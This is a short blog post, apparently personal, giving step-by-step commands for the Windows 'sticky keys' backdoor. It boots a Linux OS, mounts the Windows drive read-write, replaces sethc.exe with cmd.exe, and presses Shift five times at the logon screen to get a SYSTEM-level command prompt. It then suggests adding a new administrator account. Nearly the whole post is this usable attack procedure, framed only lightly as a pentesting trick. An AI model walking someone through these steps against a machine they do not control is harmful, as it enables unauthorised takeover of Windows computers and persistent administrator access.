Physical access == priveledge escalation pt 2

This is another method that i found out recently that allows one to obtain a command prompt at the logon screen with system priveleges. If you recall from one of my previous post, i did this same trick using the utilman.exe replacement method. It turns out that there is another exe that we can replace as well to accomplish this same trick, called "sethc.exe". You replace this with cmd.exe then reboot your computer. When you encounter the logon screen, hit the shift key five times and you should now be greeted with a command prompt with system priveleges.

Quick notes:

1. Load up any linix OS
2. Mount the windows drive in a rw state: "mount -t ntfs-3g /dev/sda1 /mnt/sda1"
3. Navigate to the Windows/System32 folder: "cd /mnt/sda1/Windows/System32"
4. Rename sethc.exe : "mv sethc.exe sethc.bak"
5. Copy cmd.exe to the name of sethc.exe: "cp cmd.exe sethc.exe"
6. Sync the changes and flush buffers, Optional but safe: "Sync"
   
7. Reboot Comp: "reboot"
8. When on the logon screen hit the shift key 5 times and you should be presented with a command prompt with system priviledges. From here on you might wanna create a new user and add him to the administrators group
   

References/Good Reading:
Pentestit